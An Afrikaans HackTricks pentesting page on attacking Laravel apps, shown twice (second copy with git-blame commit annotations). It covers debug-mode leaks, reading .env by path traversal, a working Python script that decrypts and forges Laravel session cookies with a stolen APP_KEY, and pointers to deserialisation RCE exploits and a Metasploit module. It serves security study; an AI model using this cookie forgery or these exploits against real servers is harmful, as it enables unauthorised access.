hacktricks/network-services-pentesting/pentesting-web/laravel.md

# Laravel

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

## Laravel Truuks

### Debug-modus

As Laravel in **debug-modus** is, sal jy toegang hê tot die **kode** en **sensitiewe data**.\
Byvoorbeeld `http://127.0.0.1:8000/profiles`:

![](<../../.gitbook/assets/image (610).png>)

Dit is gewoonlik nodig om ander Laravel RCE CVE's te benut.

### .env

Laravel stoor die APP wat dit gebruik om die koekies en ander geloofsbriewe te enkripteer binne 'n lêer genaamd `.env` wat toeganklik is deur middel van 'n padtraversal onder: `/../.env`

Laravel sal ook hierdie inligting wys op die foutopsporingsbladsy (wat verskyn wanneer Laravel 'n fout vind en dit geaktiveer is).

Met die geheime APP\_KEY van Laravel kan jy koekies dekripteer en herenkripteer:

### Dekripteer Koekie
```python
import os
import json
import hashlib
import sys
import hmac
import base64
import string
import requests
from Crypto.Cipher import AES
from phpserialize import loads, dumps

#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3

def mcrypt_decrypt(value, iv):
global key
AES.key_size = [len(key)]
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
return crypt_object.decrypt(value)


def mcrypt_encrypt(value, iv):
global key
AES.key_size = [len(key)]
crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
return crypt_object.encrypt(value)


def decrypt(bstring):
global key
dic = json.loads(base64.b64decode(bstring).decode())
mac = dic['mac']
value = bytes(dic['value'], 'utf-8')
iv = bytes(dic['iv'], 'utf-8')
if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
#return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
return ''


def encrypt(string):
global key
iv = os.urandom(16)
#string = dumps(string)
padding = 16 - len(string) % 16
string += bytes(chr(padding) * padding, 'utf-8')
value = base64.b64encode(mcrypt_encrypt(string, iv))
iv = base64.b64encode(iv)
mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))

app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
key = base64.b64decode(app_key)
decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlhcL1JGY0t6YzhaaGNHR1duSktIdjF1elwvNXhrd1Q4SVlXMzBrbTV0MWk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9')
#b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}')
```
### Laravel Deserialisasie RCE

Vulnerabele weergawes: 5.5.40 en 5.6.x tot en met 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

Hier kan jy inligting oor die deserialisasie kwesbaarheid vind: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

Jy kan dit toets en uitbuit met behulp van [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Of jy kan dit ook uitbuit met metasploit: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

'n Ander deserialisasie: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)

### Laravel SQLInjection

Lees inligting hieroor hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)

<details>

<summary><strong>Leer AWS hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Werk jy in 'n **cybersecurity maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
GitBook: [#3668] No subject 2022-12-03 17:35:56 +00:00			`# Laravel`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy adverteer in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af? Kyk na die [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Ontdek [The PEASS Family](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Sluit aan by die [💬](https://emojipedia.org/speech-balloon/) [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg my op Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`## Laravel Truuks`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Debug-modus`
GitBook: [master] one page and one asset modified 2021-08-28 20:43:03 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`As Laravel in debug-modus is, sal jy toegang hê tot die kode en sensitiewe data.\`
			Byvoorbeeld `http://127.0.0.1:8000/profiles`:
GitBook: [master] one page and one asset modified 2021-08-28 20:43:03 +00:00
GitBook: [#3668] No subject 2022-12-03 17:35:56 +00:00			`![](<../../.gitbook/assets/image (610).png>)`
GitBook: [master] one page and one asset modified 2021-08-28 20:43:03 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Dit is gewoonlik nodig om ander Laravel RCE CVE's te benut.`
GitBook: [master] one page and one asset modified 2021-08-28 20:43:03 +00:00
GitBook: [#3668] No subject 2022-12-03 17:35:56 +00:00			`### .env`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			Laravel stoor die APP wat dit gebruik om die koekies en ander geloofsbriewe te enkripteer binne 'n lêer genaamd `.env` wat toeganklik is deur middel van 'n padtraversal onder: `/../.env`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Laravel sal ook hierdie inligting wys op die foutopsporingsbladsy (wat verskyn wanneer Laravel 'n fout vind en dit geaktiveer is).`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Met die geheime APP\_KEY van Laravel kan jy koekies dekripteer en herenkripteer:`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Dekripteer Koekie`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00			```python
			`import os`
			`import json`
			`import hashlib`
			`import sys`
			`import hmac`
			`import base64`
			`import string`
			`import requests`
			`from Crypto.Cipher import AES`
			`from phpserialize import loads, dumps`

			`#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3`

			`def mcrypt_decrypt(value, iv):`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`global key`
			`AES.key_size = [len(key)]`
			`crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)`
			`return crypt_object.decrypt(value)`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00

			`def mcrypt_encrypt(value, iv):`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`global key`
			`AES.key_size = [len(key)]`
			`crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)`
			`return crypt_object.encrypt(value)`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00

			`def decrypt(bstring):`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`global key`
			`dic = json.loads(base64.b64decode(bstring).decode())`
			`mac = dic['mac']`
			`value = bytes(dic['value'], 'utf-8')`
			`iv = bytes(dic['iv'], 'utf-8')`
			`if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():`
			`return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))`
			`#return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()`
			`return ''`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00

			`def encrypt(string):`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`global key`
			`iv = os.urandom(16)`
			`#string = dumps(string)`
			`padding = 16 - len(string) % 16`
			`string += bytes(chr(padding) * padding, 'utf-8')`
			`value = base64.b64encode(mcrypt_encrypt(string, iv))`
			`iv = base64.b64encode(iv)`
			`mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()`
			`dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}`
			`return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
			`app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='`
			`key = base64.b64decode(app_key)`
			decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlhcL1JGY0t6YzhaaGNHR1duSktIdjF1elwvNXhrd1Q4SVlXMzBrbTV0MWk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9')
			`#b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'`
			`encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}')`
			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Laravel Deserialisasie RCE`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Vulnerabele weergawes: 5.5.40 en 5.6.x tot en met 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Hier kan jy inligting oor die deserialisasie kwesbaarheid vind: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Jy kan dit toets en uitbuit met behulp van [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\`
			Of jy kan dit ook uitbuit met metasploit: `use unix/http/laravel_token_unserialize_exec`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
GitBook: [#3668] No subject 2022-12-03 17:35:56 +00:00			`### CVE-2021-3129`
GitBook: [master] one page modified 2021-09-06 19:52:01 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`'n Ander deserialisasie: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)`
GitBook: [master] one page modified 2021-09-06 19:52:01 +00:00
GitBook: [#3668] No subject 2022-12-03 17:35:56 +00:00			`### Laravel SQLInjection`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Lees inligting hieroor hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)`
GitBook: [master] 2 pages modified 2020-11-12 00:37:38 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`<summary><strong>Leer AWS hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Werk jy in 'n cybersecurity maatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Ontdek [The PEASS Family](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Sluit aan by die [💬](https://emojipedia.org/speech-balloon/) [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg my op Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`